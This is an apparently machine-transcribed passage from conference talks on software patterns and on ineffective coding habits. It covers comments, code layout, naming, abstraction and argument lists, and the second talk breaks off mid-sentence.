provide a recurrent vocabulary. Now, to wrap up, it's a really neat idea that goes beyond this, this idea of a pattern language, which is, oh, what are all the possible solutions? Imagine J, the JUnit storyboard is one single story, but there's lots of different ways of writing a testing framework. I could basically show you all the branches and decisions that you might possibly take in designing a testing framework. And that would be very difficult and very rich and, yeah, how do you, how do you write such a thing? It's quite difficult to write a good pattern language and present it visually. A chap called Jim Siddle a couple of years ago had a moment of inspiration. He went back to these Choose Your Own Adventure books, these Choose Your Own Adventure books where you reach the end of a particular page and it says, if you want to take the tunnel on your right, turn to page 53, but if you want to take the tunnel on your left, turn to page 72. And so you get to explore the design decisions. And he did this with a pattern language that Frank Bushman and I developed for one of the poser books. And he brought it to life. You realize the framework needs a logging facility for requests and wonder how logging functionality can be parameterized and so on. If you wish to use inheritance, turn to seven, if you prefer the use of delegation, turn to three. It's a really neat little paper. And in it he explores all the possibilities. So this is an idea of using patterns as a way of communicating knowledge, but also how knowledge can fit together. You're almost getting paper-based designs that you can explore and figure out things and draw conclusions from. So there's an experimental aspect to that. It's a really, it's a very, very, very promising, but from the author's point of view, very labor intensive. But as an idea, don't feel you have to write this stuff down. It's just the stuff we might do at a whiteboard. When you're sharing somebody, you can do this way or this way. Informally, you can create this. What you're doing is you're mapping out the design landscape for them. So I will end with something that I wrote up a few years ago when I was really frustrated. Everybody was coming up with a stupid manifesto and I thought, you know what? Patterns doesn't have one. It's time we had a stupid manifesto. And it's a really, very simple one. It is this idea, we are uncovering better ways of developing software by seeing how others have already done it. That is the premise. That doesn't solve every problem. But if you look at most software systems, 90 to 95 percent of what is done in those systems is not new. And yet we still struggle through lack of communication or our inability to reason about these things, insufficient knowledge, if you like. We still struggle with those. So the whole premise of Patterns was really, as Brian Foote observed, a blatant disregard for originality. Let's actually just look at the things that we know work and get on with those so we can build the things that are new. Thank you very much. Thank you. Thank you. Thank you.
Apparently, everyone knows about patterns. Except for the ones that don't. Which is basically all the people who've never come across patterns... plus most of the people who have. Singleton is often treated as a must-know pattern. Patterns are sometimes considered to be the basis of blueprint-driven architecture. Patterns are also seen as something you don't need to know any more because you've got frameworks, libraries and middleware by the download. Or that patterns are something you don't need to know because you're building on UML, legacy code or emergent design. There are all these misconceptions about patterns... and more. In this talk, let's take an alternative tour of patterns, one that is based on improving the habitability of code, communication, exploration, empiricism, reasoning, incremental development, sharing design and bridging rather than barricading different levels of expertise.
10.5446/50613 (DOI)
Right, good afternoon. Is that coming through? Yeah, okay. Thank you to Thomas Eccley for taking a picture of me and posting it saying if anybody looks like an evil genius, it's me. Thank you. I like that. That's a good start to the day. I'm going to use that one with my kids. It's just that, you know, do the right thing or else. Okay, so yeah, I was, you've had a hard choice. I know you've had a hard choice because I've looked at the program and this is a hologram of me. The real me is in one of the other talks that's going on at the moment. There's quite a lot on at the moment. Yeah, we're going to let us learn about holograms. That's right. We're going to look, no, sorry. That's far too technical. We can't do that first thing in the afternoon. That's why we're on. That's why there's these speakers on at this time. So I'm going to give you seven things. I like magic numbers, seven. We're going to go for seven. Seven ineffective coding habits of many programmers. Chances are you do at least one of these. That's not necessarily a bad thing. I have done at least one of these. I'm not going to tell you how many. That's the whole point. We learn by trying things out, but we need to be a little more empirical, a little more experimental with some of our habits because we acquire habits. That's the whole point. We pick habits up because they are low energy. You don't have to think about everything. If you have a habit, then it makes it easy to do something. This is a good thing, not a bad thing. The problem is though, we sometimes pick up habits without really thinking about it. We suffer from a lot of cargo cult programming and borrowed habits, habits that we picked up years ago from different environments that no longer apply. Or habits that we're doing because, well, everybody else does them. If you are a parent, you may have already encountered this one. Why are you doing that? Because so and so at school does it. Oh, okay. If so and so jumped off a cliff, would you do it? This is a standard parent line. You get a free pack of parental quotes when you get a kid. I'm working my way with my older boys, turning into a teenager, so we're finding a whole new chapter. It's fantastic. That's the point. Do we just do things out of habit? Do we follow habits out of habit? That is the problem. I want to question some here. You will undoubtedly disagree with me on a few of them. That's a good thing because it shows you're awake. But please reason through them. Really think about it because as I said, I've tried some of these I've sleepwalked into in other cases. I've kind of felt there was something not quite there from the start. So those things, I can't actually speak Chinese, but these have been conveniently translated for me. A couple of these things might be relevant as I talk. This is probably more relevant. I write when I'm not writing code. I write a little bit of short fiction. And this means that I do really care a lot about readability and reading and style. And Doug Crockford noticed in the very slim volume, unsurprisingly slim, JavaScript, the good parts, it turns out that style matters in programming for the same reason it matters in writing. It makes for better reading. And I want to emphasize that that we, many of our reading habits are precisely that. They are habits. Reading is not a natural state for a human being. If you've, again, if you've got children, you realize that reading is one of the last things they actually get to do, that they actually learn. It's really not one of those things like eating, walking, talking or anything like that. Reading is a far more subtle thing. And therefore, it taps on parts of our brain that we're not expecting. It taps on areas that we would consider now when we talk about visual design. It taps on areas to do with reasoning. It's not a single place. Reading, it covers a multiple, a very wide range of brain matter, if you like. And it is a learned practice. So anything you can learn, you can learn something else. But I want to try and talk about this in terms of properties. Let's, so let's start off with picking out the signal from the noise. Just as a general point, if you remember a few years ago, it was very popular for the Earth to end. This was, this was announced on Friday the 13th, which is, you know, by the world, I was in New York, it was World Trade Center. If you're going to announce the end of the world, that's a really good place to do it. And a good date. But this guy was just lost in the noise. Turns out the world didn't end then. And it didn't end in October that year either. And it didn't end at the end of 2012. We were supposed to have Ragnarok in February. That didn't happen either. You know, it's a good excuse for a party. So let's talk about noise. Let's talk about picking out the signal from the noise. Signal to noise ratio. This is an engineering term. But we often repurpose it. We talk about it as a measure used in science and engineering comparing level of a desired signal to level of background noise. But in everyday conversation, we talk about it as the ratio of useful information to false or irrelevant data. Okay. So in a conversation or exchange. So let's pick on a fairly famous piece of English. William Shakespeare apparently wrote other stuff, but here, this is the only bit that ever gets quoted. This is quite a nice piece of English. It's quite dramatic. He makes extensive use of short words. And yet, it's very, very deep in meaning. Can we make it clearer? Could we perhaps translate it into office speak or business speak or marketing speak? Well, conveniently enough, somebody's already done that. A fellow called Tom Burton in a book, Long Words Bother Me. Very interesting book on language. And he translated this into marketing speak. Enough with a to be or not to be. Continuing existence or cessation of existence. Those are the scenarios. Is it more empowering mentally to work towards an accommodation of the downsizing and negate? Good grief. I mean, you know, this, you could put this on a PowerPoint in a standard business meeting nobody would notice. This is, it would just slip in there. And the problem here is that we've added more words. We've added longer words. Have we actually added any meaning? No. And this is the problem. We have a lot of habits. Without realizing it, we add noise to the code. So we can take, so this is one of those little examples. I kind of recycle a bit. Recently used list, very simple example, a list that holds your recently opened files. So a list of strings, but it has the property. Just go in at the head like a stack, but they're also unique. Like a set. When you reopen a file you have already opened. It doesn't occur twice. It just goes in once. And I use it as a programming exercise. It's a really good little lab. And so one group, one pair a few years ago produced this, this C-Shop. And they said, well, we finished the exercise, but we're really not sure that, well, we're not happy with the code. Because the kind of model answer is about this long. Now, what's interesting is not simply that it takes up half the space, but when you actually look at the lines of code that do stuff, it's about a third. So if we get rid of all the curly brackets and other spacing forms and declarative noise, then there's a very big difference between the two. You know, five lines versus actually quite a few more. Imagine this style carried out over a whole code base. It's not the case that the example on the right is easier to read than the one on the left. I want you to think, what happens if you use the same kind of thinking over a whole code base? I've seen those code bases. You're sitting there looking at classes of thousands of lines long. And you know that in there somewhere there is a small class struggling to get out. But it has identical functionality. Actually, the one, that one's slower than that one. So the, so the, so there is this case. There's so much noise. Which one do you want to work through? It's greater cognitive effort, more cognitive load. One of the most common sources of noise is comments. Thanks to Oracle for this one. But as I've, so there's the real, you know, all of that just for Hello World. I love the fact that they listed as a Hello World app. That makes it sound so grand. But one of the things that I've, I've, I noticed I used this for a couple of years this slide in different contexts. But I, I realized after a while when you actually cut through the noise and you look at the one line that actually does something, it's wrong. There's a missing comma. Oh, it's wrong in English. I mean, the Java's fine. You can convince a Java compiler to do anything. Yeah. The English is wrong. It's missing a comma. It should be Hello, comma, World. Okay. This is really important. It's not just trivia. I'm not just picking, picking minus syntactic points here. There's this kind of classic saying people say, you know, there's a difference between let's eat grandma and let's eat grandma. Punctuation saves lives. All of this and they get the one thing that matters, the real piece of communication to the user and it's wrong. You're never going to notice that with all that noise. So a long time ago when I was first learning C, one of the things that was given to me was this article, well, this paper by Rob Pike. He wrote it in 1989. So I must have read it fairly soon after. Notes on programming in C. And there's some really good stuff in here. And there's a couple of things that definitely show its age and its time and its language. But as he says, comments, a delicate matter requiring taste and judgment. I tend to err on the side of eliminating comments for several reasons. First, if the code is clear and uses good type names and variable names, it should explain itself. Now let's turn that around. He's sort of saying clarity is a consequence. You know, if it does this, then you shouldn't need comments. Now let's turn it around. Use good type names. Use good names in order that you do not need any auxiliary mechanisms. You may need some, but the idea is minimize that which the code cannot say. Just get rid of the noise. You may not be able to eliminate it completely, but the idea is it should be your goal to rewrite the code. Sometimes a very useful technique is to imagine that somebody has removed the commenting feature from the language. How would you write your code then? Okay, for some people, they probably will make the slightest bit of difference. But for those of you who are here, it will. Think about it. What would you say? Would you say anything differently? Okay, say it like that. And then allow yourself comments back. Is there anything left that you would also like to communicate to the reader? And often it's the stuff that's not obvious. Second comments aren't checked by the compiler. Actually quite frankly, they're not checked by the programmer either. So I don't know who the audience is. Yeah? The compiler skips and programmers skip. We even use different colors in our IDEs. I've even seen people use white on white background in order to skip that. Some IDEs come with the ability to fold away the comments because that's how important they are. So we don't read them. And if you read them, then it's ultimately, it's a bit like reading the instructions. It's a sign of defeat. Yeah? I bought a new Blu-ray player last week. And I sort of strode into the house proudly with this one. None of the cheap ones are only good, I said to my wife. Oh. But it's not the most expensive one in the shop. Great. She knows how much the most expensive one is. But it was quite good. And she said, you're not going to look at the instructions, are you? No. Yeah? That's the fact. You can file those away wherever you file them. I'm going to set this up because I am programmer. And if it doesn't work, then it's the designer's fault. I got lucky. It worked. So the point is there's no guarantee this stuff is right as we just saw with the distraction and the code level. But the other thing is the, there's a visual aspect here. The issue of typography, comments clutter code, I'm going to come back to that visual aspect again in the next item. But I think my favorite piece in this Rob Pike paper was this. And as he says, don't laugh now. Wait until you see it in real life. In real life. I did laugh. And then five years later, I found it in production code. It's just that I was stopped in there and I was reminded. I said, I've seen, yes, somebody actually wrote about this a few years ago. Absolutely astonishing. If you are, if you do not know what this is going to do, you have no business looking at this code. Okay? It's really not in your place. Yeah? So we have this other issue. So I tweeted this a while back. It seems to have been retweeted quite a lot. Common fallacies is to assume authors of incomprehensible code will somehow be able to express themselves lucidly and clearly in comments. If you think about it, because I've often said to people when we've talked about comments, they say, oh, well, you know, programmers sometimes, you know, the code can't be, can't be easily understood. So somebody wrote it. Who's going to comment it? The programmer that wrote it. So we're going to get the same person to write the comments and they couldn't clearly express themselves. I mean, some things are genuinely hard, but quite frankly, most code doesn't fall into that category. And if you can't express yourself fluently in code, it often means that you're on a learning curve or, so that's the good bit, it's always nice to be able to say, look back and go, damn, I was such an idiot. That's great. It shows progress. Either you're on a learning curve or you flatlined. Your learning curve is dead. That's it. So there is this question. We need to really revisit this stuff. This stuff gets in the way. Now, this kind of suggests that we want to look at other aspects of the code. What I want to look at here is the one that people say, you can't touch that. You can't talk about that, Kevlin. You're going to talk about indentation and spacing. But don't you know that that's not a reasonable conversation that you can have. You will never have a rational conversation about spacing with developers. Just leave that one alone. It's a personal preference. It's untouchable. It's like they're talking about the baby's names or something like that. You just don't go near it. Yeah, that's why I put it number two, not number one. I'm going near it. Right. So, remember this? Remember this? How would a programmer do it? They do it like this. We have a bit of a problem here. We have a bit of a problem. Let me show you the shape of the problem. So, this is slightly beyond HD. HD is 16 to 9 in terms of its ratios. But there are some 21 to 9 screens coming out. And we fall in love with our high resolution monitors and our widescreen monitors. You can actually now project the whole of the Serengeti across your workspace. And it's magnificent. And it's beautiful. And you need a pair of binoculars to see all of the antelope from one side to the other. After a hard day's working, your neck is aching because the code has been going from one end to the other. And this is the problem. This is how many programmers lay out their code. They say, well, that's great because I've got a big screen. We don't need to live in the years of 80 columns and 24 rows anymore. Yeah, yeah. Because we've got better technology. What is this, we? I'm still wearing the same eyes. Actually, they're not, no, they're worse than they used to be. Okay, you still got, we haven't evolved yet. We have not kept up with screen resolutions. Come back in 2000 years. Let's see how we're doing then. Probably need another 10 or 20,000 years before it really takes hold. But that's the thing is our ability to perceive has not changed. The bit we can focus on, it's a tiny little bit there. We've got peripheral vision to around there. When you read, if you watch any kind of eye tracking study, it's very interesting. People don't read the way you think they read. And if you have to start moving ahead, that's never a good sign. So the problem here is that that's column 80. We get a lot of stuff out here. And I had some very interesting episodes. There was a couple of years, actually, I was here in Oslo, doing a code review with one group. I do strongly recommend doing code reviews on whatever is not your work machine. Because where do we read code? We read code. We read code on laptops. That's got an HD resolution. That's fine. Put it on a decent screen, double headed monitor, no problem. Put it through a projector, though. And there's loads of projects. I saw a projector the other week that was still at 1024 by 768. Most projectors are sort of 1280 or above. But the point there is use a projector. And this is exactly what happened. The program, we had two lines of code following each other. And they were identical up until the right hand side of the screen. And the program said, oh, yeah, they are actually different. This argument list is quite long. And the method names are quite long. But they differ somewhere around here. And then I think the comment that you always have to chuckle at, it worked on my machine. That's not just about it ran on my machine, but actually does the code look any good? This is another, I tweeted this a while back and somebody else made the other suggestion. And very good observation. I hadn't really thought about it. But increasingly, I read a lot of stuff on tablets and phones. Try doing a code review. Go to the coffee shop. Take your tablet with you. You'll suddenly say, oh, well, this would be great. Hang on. There it is. The point there is you need to appreciate how people read. Don't work to one resolution and one idea of how people read. And actually find out how people do read. Turns out they read a lot more like this. I'll give you column 80 rather than column 60. See if you can stick to double digits. I tend to use column 80 like a sort of a soft, soft stop. But if I hit three digits, I know something's going wrong. And when I pointed this out to this guy, he said, so you mean 160 is too long? Yeah, I think so. And he looked at this one that was 200. But that's nothing. I visited the company a few weeks ago. And it was like a graph, the code. If you zoomed out, it was just sort of, but, but, but, so we went out. We found something at column 352. It was a line that went out that far. We were kind of disappointed that there weren't an extra 13 characters to make it up. There were one column for each day of the year. But the point there is that that's difficult for people to read. Why is this difficult for people to read? How do people lay stuff out? How do people really lay stuff out? Go and pick up a newspaper. Go and look at a website. And you will discover that people do not actually try to use up the whole horizontal space. In fact, they actively seek to not use it. This relates to a point that we need to embrace. It's a thing called clean design, or it's visual design basically. Now normally when people think of clean and the word code, they're sort of thinking Uncle Bob and his recommendations. That's great. That's the functional side of it. That's the syntactic, the semantic. But I want to talk about the visual aspect. To answer the question, what is clean design most succinctly? A clean design is one that supports visual thinking. So this idea of visual thinking, the idea of arrangement so that people can see what's going on. If you look at the way that posters are laid out. If you look at the way that ordinary web pages are laid out. And look at the pages that you think are good. Look at the pages that you don't think are good. See how they structure it. It's the same human visual perception system that's responsible for code. So therefore you need to think how somebody is going to read this. So this is the idea. People can meet their informational needs with a minimum of conscious effort and also physical effort. You don't really want to be doing that a lot. You convey information by the way you arrange a design's elements in relation to each other. When you put things above each other, it signifies one thing. When you put things apart from each other, it signifies something else. And this is something important because what you're doing is you're actually showing the reader how to think about something. They're not just looking at the words and the parentheses. You are showing them these ideas are together. These ideas are separate. These ideas follow this idea. That's what you're doing when you lay things out. Now you may not be aware you're doing it, which is where we end up with a slight problem. There's a bit of a gap sometimes. And there is this idea of a term I came across just last month. Structural honesty. Does the structure of your layout, is it honest? Does it convey what you actually are trying to show with the syntax? That's a very interesting idea. So, you know, if the visual relationships are obviously accurate, this is fine. But if they're not, your audience is going to get confused. They will have to examine your work carefully. Now, you may be so proud of your work that you think this is a good thing. I put so much effort into it. Of course, I want people to examine it carefully. Or alternatively, there is, it was hard to write, it's going to be hard to read. Yeah? You've got different ways of coming at this. But I want to talk about this from another point of view. So, the first thing is structural honesty. That's the first requirement. Because people normally assume, as I said before, that spacing is somehow a personal or just arbitrary cultural preference. Java programmers do it one way. C sharp programmers do it another. C programs have half a dozen different ways of doing it. Python programmers have one way of doing it and there is no other. There's lots of different variations. And we assume that these are somehow given and are not open to question. I'm going to question that. I don't think they are a given. So, let's look at some things in terms of visual honesty and visual structuring. So, how not to lay out a method header? I see this so often. It's so common in code. I'm going to blame most of the, am I going to blame the Java guys? Yeah, I'm going to blame the Java guys. They do this most. Followed rapidly, hot on their heels by the C sharp folks. I tend to find this less in other languages. I'm not going to say they, I don't find it. But in terms of cultural tendencies, the problem with this is this is about as structurally dishonest as you can get. Because where is the argument list? You're only allowed to use one finger. Ah, see the problem? We have a phrase, an argument list. Okay, where are the parameters? They're in two places, but it's one parameter list. It's on two different sides of the screen. Much more exciting if you've got really long names because it could be off the screen. So, are you calling that single argument method? Which single argument method? I'm calling the two argument one. No, there's no two argument ones here. Well, yeah, there is. Just keep scrolling. Keep scrolling. There it is. The point here is that this is about as dishonest as you can get. It's kind of like, ha ha, full juice. There's one over here and one over here. So, if I had to pick the worst style, this is probably going to come close to it. I'm not going to tell you what the right style is. I'm going to tell you what the right properties are. We need to approach any convention that we adopt in terms of requirements, not end user requirements or customer requirements, but requirements. What do we want from a layout? The first thing I want is this idea of visual reasoning and structural honesty. So, if you got that, that's a good start. So, that suggests you can do it like this because the arguments are grouped. They are vertically grouped. There is one consistent reading order. Alternatively horizontally, there is one consistent reading order. I don't care which one you do. You can even try and mix them about a bit. I don't care, but the idea is they both have this property. But there is one to not do. This one is very common. Now, we may say, well, that's fine. I don't see the problem with that because it's structurally honest. It is structurally honest. Everything is in the right place. The argument list is in one place. It is vertically organized. It has a simple structuring principle. But the problem with this is nothing to do with that. It's to do with the second requirement, which is sustainability. What do I mean by sustainability? Well, let's look at a couple of method calls. Same principle. We have that there. We align it with the opening parenthesis. I'm going to say, do it either like that or like that. There's a couple of other variations. I don't really care because the one thing that we know happens in code is change. Change is the most common thing. The minute you do a rename, boom, it's wrong. It becomes structurally dishonest. In other words, the reason I don't favor that style is that unless everybody is working with an editor that naturally aligns this, you would more likely to find this in the list space than you are in the enterprise language space, then this first style is doomed to failure. It will never work. That's a very, very grand statement to make. It will never work. Okay, let me put it another way. It will only ever work if nobody ever touches the code. Again, never. In other words, it's one of those techniques, one of those ones that comes out and it looks right the first time you write it. But from that point on, it's doomed because the minute that anybody does anything that causes a shuffle, it is unstable. It's unsustainable. I'll leave aside the fact that you end up with this kind of alignment problem that it bounces around the page as you scroll through a file. It's completely arbitrary alignment. It's like rolling dice to figure out which column should I put something in. But that's a personal preference. I want to attack it on the fact that it's just not a workable style. This is the one that upsets people most, I've noticed, whenever I say this. I actually had somebody come up to me after saying this, say, well, I disagree with you. Well, of course you would. You know, get over it. So every time I do this, I make sure I go around, or every time I do a rename, I go through the whole code base to check that everything is still aligned. This is what we call a high maintenance approach. It takes a lot of work. Why do you choose an approach that's difficult to maintain? Do your colleagues also do what you do? And then a dark cloud appeared over his head. No, they don't. And I said, there is the floor in your otherwise, well, heavy, heavy working plan. So the point here is, yeah, it kind of looks pretty the first time you do it, but, you know, we can read anything. Choose something that's easy and sustainable over time. Which means I'm now going to talk about something else to do with spacing. Which is this point about arbitrary alignment positions. So this is a, this is a formatted according to kind of orthodox Java style. And if we look, we see that there are a number of points of alignment where the eye is drawn. It's drawn to that line. It's drawn to that line. It's drawn to this line. We've got three lines whose only meaning is we just happen to be here. And then we've got three lines over here that actually represent logical indentations. So we've got six points of alignment and not very many lines of code. It's quite busy. Okay? Your eye is having to do an awful lot of work. So reduce the number of points of alignment. Stop pushing people out to the right-hand side. Okay? If something's important, it should be on the left. Is the parameter list of a method important? You betcha. It should be somewhere people can read it. It should be either a natural follow on or immediately to the left. People read from the left. Okay? Okay? There are alphabets that don't, but we're talking code here. Pretty much all languages that we're dealing with go from the left. So therefore adjust to what people are doing. Don't maintain a fantasy. Putting your argument lists, putting your arguments over to the right. It's a stupid place to put them if it's off the screen. But we've also got this arbitrary alignment thing. So let's realign it. Well, this is better in one sense because we've now got three points of alignment or three lines of alignment, which is great. There's only one problem. Visually, what does this look like? Well, if you kind of squinted it, actually, I'm not going to, don't worry, don't squint. We'll just replace them all with X's. Let's just get rid of all the punctuation and see what you're actually seeing. Now, I can't tell the difference between the argument list and the first declaration. This style, there's a technical description of it, does not work. Okay? It does not work because visually there is no distinction between two fundamentally different ideas. Here are the parameters to your method and here are your local variables. That's kind of important. Call me a bit old-fashioned. I think that's quite important. So we have a couple of choices. Again, I don't, well, there's more, but again, I don't care which one you choose. You can either sit there and go, whoa, double indentation. Okay? Put them somewhere else. That kind of looks okay. It's visually distinct. Alternatively, stop putting your Kelly brackets in the wrong place. Yes, there is such a thing as a wrong place. It took me 25 years to discover it. I've used all the styles, even some of the crazy ones. I've tried everything and it's just that actually there are reasons. I can read all of them, but it turns out there are some that actually make more sense and it's this idea of sustainability and visual design that actually makes, tips the balance. So that's some food for thought. Let's deal with something slightly less contentious now. Oh, yeah. And of course, that obviously has visual distinction. Let's talk about Lego because Lego is good. Any excuse to talk about Lego is a good excuse. Except that we have a bit of a problem here. Lego naming. What's Lego naming? Well, Lego naming is where you take sort of parts of Lego. I'll have a kind of a red 2 by 4 and I'll stick that with a kind of like a white 2 by 2 and I'll put this together and I will create a name. This is kind of like what my kids used to create in terms of those towers that you're sitting there going like that's going to fall, that's going to fall, and there will be tears. This is how we name things. What's the process? It's called a glutination. Linguistic morphology is where you derive complex words by gluing together other words. Some languages do this more than others. Okay? So here's the longest word in the English language. I think it's kind of ironic because it was invented to be the longest word. Nobody actually uses this and it's basically made up of Greek and Latin rather than English. So, yeah, not interesting. Here's something closer to home. This is a bit of Norwegian. Yeah, you bet. I'm not going to pronounce it. However, I'm afraid, yeah, you know which language is going to win. Of course, it's German. Although technically this word was, it's no longer a word because it was retired last year. It's about 64, 65 characters. It refers to an EU regulation that is no longer an EU regulation. The abbreviation is 12 letters long. But it turns out that even if you can read Norwegian and German, this is not a very natural way of dealing with words. This is too long. You can't grasp it in one go. You have to kind of pause. You will eventually abbreviate it. So what's the problem with our words? Yeah, identify names. There's even sites that make fun of this kind of whole approach of stacking standard terminology together. There's method name and class name. You can just go there and refresh the screen and it will give you new class names and method names. Just made up of standard parts. What are the standard parts look like? Well, they kind of look like this, you know. It's one of those things. Oh, it's a proxy service manager controller. Factory. Factory. Just remember for every factory, factory you ever create, somewhere on the internet, a kitten dies. Okay? That death is on you. We just take these names. We add them together. We say, oh, look, I'm creating meaning. It's now really meaningful. I refer you back to the Shakespeare example. I've made the name even longer. I've poured more meaning into it. No. What you've done is this is like homeopathy. What you've done is you've diluted the meaning till it's all gone. There is no medicine there. There's only sugar. That's it. It does nothing for you. But does it really take a long name? I mean, sometimes we end up with these names and you're sitting there going, well, I can read all of the parts, but I have no idea what the whole thing means. Yeah, but surely you know what a manager control proxy is. Funny enough, not today. But we've got a factory for one of those. Don't even begin on the name. It tells us something about our coding style as well. It tells us perhaps that we are failing to find the right abstractions, the ideas that name things directly. We often find this as well. There are these naming habits. It doesn't even have to be long names. So here's one from a piece of client's code that I counted a few months ago. It was about three months ago. And even at this short length, condition checker, not a long name. Check condition, not a long name. But I was looking at this thing. It's like condition checker. We've got validators and checkers and all kinds of stuff. And I said, what's the condition checker do? Well, we call it to evaluate a condition. You mean it is a condition? Yeah. And what do you check it for, whether it's true or not? You mean this. Yeah. Oh, that's what it means. That's what it is. It's not a condition checker. There's not some kind of condition sitting out there in sort of a platonic space somewhere. There's not some kind of abstract condition that we somehow have to reach. Is there a fire? Not something that we actually have to go out and check for. There is this idea very, very direct. It's a condition. Is it true or is it not? And it's a very simple statement. Now, when you start applying that, it also takes you other places. So here's something. I was going to do this in C sharp. I decided, no, I'm going to put this up in Java because it allows me to use the throw signature, which is not something I'm a big fan of, but it allows me to cover two things at once. We have a very standard vocabulary. And sometimes people say, oh, it's okay because it's standard. That means I know how to read it. Yes, the problem is you may not be communicating meaning. So create connection. That doesn't seem particularly harmful. But how many things do we have that are called create that return something? Do we need the word create on everything that creates a new object? Is that helpful information? Remember you have a fairly limited bandwidth. There is a reader out there and you have a few characters in which you can say, this is what I want you to notice. And you might not otherwise pick up. If you try to tell them absolutely everything, here is a method that uses objects. Well, they probably already know that. So don't tell them that bit. Here is a method that's going to return you something that has been created. Okay. But give me a better sense of it. And then we have a habit that I, you know, I was completely blind to this from till about 18, 20 months ago. Completely blind to it. We put exception on the end of exception in so many cases. This is a very common.net and Java habit. And I noticed I was going back to some C++ code and I suddenly thought, why am I not putting the word exception on the end of all the exceptions? And I suddenly realized, because I don't need to. Think about it. So first of all, what are you really doing? You are creating connection. This is a mechanical description. What are you, what is your intention? I am trying to connect to that thing over there. So what we've done is we've ended up doing object oriented assembler. Instead of saying, I want to connect to that, we've kind of hidden that and said, I'm going to create a connection rather than our intention. I want to connect to that. I'm going to, but if this doesn't work out, I'm going to throw you an exception. What does the exception indicate? It indicates a connection failure. It does not indicate a connection failure exception. Okay. My name is Kevlin Henney. It is not Kevlin first name, Henney last name. Okay. Of course, it's, of course it's an exception. What else could appear in a throw clause? What else could appear in a catch? What else has a name like connection failure? In fact, it's, it's kind of interesting. If you strip that exception off, you can actually find the good exception names. So in the Java library, there is illegal argument exception. If I strip off the argument or other extra of the exception, illegal argument, that's actually quite meaningful. That's quite a good one. On the other hand, in.NET library, I find argument exception. If I strip off the exception, I just get argument. That tells me that we haven't really expressed ourselves. And likewise, in both cases, there's null pointer exception and null reference exception. So when you receive that, that means that something bad happened. What was, what was bad? A null pointer. No, there's nothing wrong with a null pointer. Tell me what was bad. D-referencing a null pointer. That's bad. So that's the name of the method or the name of the class. So try that out, you know? You probably have stones thrown at you by your colleagues. But, you know, I recognize that's the harder one to do, but at least the intention elsewhere. Try and communicate the intention. Don't always talk about the mechanics. So speaking of that, let's talk about abstraction or lack of it. Under abstraction. So this is a slide that I've used a few times. This is from a blog by Philippe Calçadeau. It's about five years old. Unfortunately, the blog's gone offline, but you can still find it using the Wayback machine. And it's a technique that I've encouraged people to use. And I've actually visited companies, visited a company last year where they had all of their projects, had tag clouds up on the wall. And this idea is very simply, you get your source code, you strip out all of the comments and all of the string literals, and you push through, push this into something like Wordle or some other tag cloud generator, and you find out what the overall map is of your code. It's a very odd way of looking at code, but we've already looked at code oddly in one sense. I replaced all of the code with Xs. And that's the technique I think I picked that one up from Michael Feathers. There's another technique that I use which is zooming out. Look, choose the smallest font size. You possibly can and see what the code looks like. It gives you an unusual perspective. Okay? Code is complex stuff. You need more than one point of view. This one strips out all of the, well, all of the code structure. We're just left with the names. What does that tell you? Well, in this particular case, it tells us that we really like strings. And lists are quite good as well. And we've got a few integers thrown in for good measure. Wow. So that's what your system does. Your system does strings with a few lists and occasional integers. Gosh, that must be really exciting to work on. Because I work on this system. What do you guys do? Oh, we do stuff with pictures and printing devices and products and paper. Oh. You still got any strings? Yeah, but strings are really small, isn't it? This is the point. We're communicating in the language of the domain. The domain is about these things. We've ended up with object-oriented assembler. We have, without thinking about it, the intelligence that goes on up here, we thought, oh, I can use a string for that. I can convey that using a list. Like, rather than what is it, what is the idea? Shall I name the idea? And using a language, you know, most languages allow you to introduce a name for the idea. So we end up with type names. And so therefore, really enriching that. And that idea sort of riffs off a guideline from Dan North, code in the language of the domain. And I think this is a really interesting example. I really like it because it doesn't use any programmer abbreviations. And yet it's not entirely clear what's going on. The only abbreviation in this piece of code is ID. But that's a real world abbreviation. It's not a programming abbreviation. So every single word there makes sense, but the whole thing doesn't make sense. Should we have a comment? Well, no. This is the whole thing. We have not abstracted enough. To abstract is to remove something. In this particular case, we can actually extract the method, not merely abstract it. And we end up with something that's far more meaningful. All of that mechanics goes away. And that's the problem is as it's this kind of balance of skill that we have, we care very much about the mechanics, but we also care about the abstraction. Sometimes we get a little confused between the two. We put the mechanics where the abstraction should be. We mix our levels up. That's the intention. Beneath it is the mechanics. And so there's this idea that in anything other than a hundred line script, you really want to start organizing the mechanics away according to intention. When the system gets large enough, even the intention becomes mechanical. So you have another layer. But this is the idea. We have a choice here. And when it comes to code, when it comes to code, you have only three ways of expressing yourself effectively. Names, spacing, and punctuation. And the language takes care of most of the punctuation. So that's it. That's how you communicate to other people. Of these, the names are the most important. We've also looked at the spacing. These are your only tools. The other thing is to look at things from a different perspective. Let me offer this one. This is one from Gregor Hopper. It's very simple idea. What is the perspective we want to encourage people to look at? Well, look at it, look at a method from the outside, not just from the inside. We often write our code inside the method. And when we see our parameter names, we see them as well named. We hope. We see them as well named. And we can see them and there's no problem. They make sense within the body of the method. But what happens when we look at it from the outside and try and use it? Now, if we look at this, we see, you know, parser, yeah, I can understand what that is, process nodes, yep, that seems to make sense to me. Text, yep, I have no problem understanding that. False. What? I have no idea how that relates to parsers, processing nodes or the text. What does the false mean? Why is it there? What does true do? Okay? And there is this sense that what somebody has done is they've said there are two options. Now, can I think of a data type that only has two options? Oh, yes. Booleans only have two options. Great, I'll use one of those. And the problem is what is true in this case? I have no idea. There's lots of ways of solving this, but the idea is that on the inside of this, it probably looks quite sensible. You know, maybe it says, is formatted. I can't even remember the example. But in the body of the method, it makes sense. From the outside, true and false make no sense. The most extreme example I know of this was a code review I did a few years ago where there were five arguments that were all Booleans. And on the inside, it looked perfectly sensible, if is enabled and can have logging. Oh, it all looked great. From the outside, true, true, false, false, true. What? There's no kind of sense there. You have to look at it from the outside. But that kind of long argument listing. Keep this in mind. We often under abstract. We end up with these kind of long arguments. Okay? Yeah? Now, different people have different tolerances. I used this quote with a team a couple of years ago. Because I was looking at some code. I said, look, all your constructors have 14 or 15 arguments. And then I used this quote. They seemed unmoved by this. And then one guy piped up and he said, oh, I think I understand the problem. He rummaged through the code, pulled up this thing and put it on the projector. He said, this constructor takes more than 70 arguments. I said, ah, I see the problem. As far as you guys are concerned, when you look at 10, you're thinking, wow, we wish we could have that few. You know? I'm saying it's like a lot and they're thinking, no, no, we aspire to have as little as that. But over the years, when I've retold that story, the record now stands at 326. The guy sent me the diff from the point that it was 325 to 326. You know? We had the conversation that it was 325. He emailed me a few weeks later. And here's me adding another one. That's the point. It's statistically, once you hit 10, 10 is as good as 11 is as good as 12. And it will continue on this way. Okay? So, yeah, it's a whole project just to call the 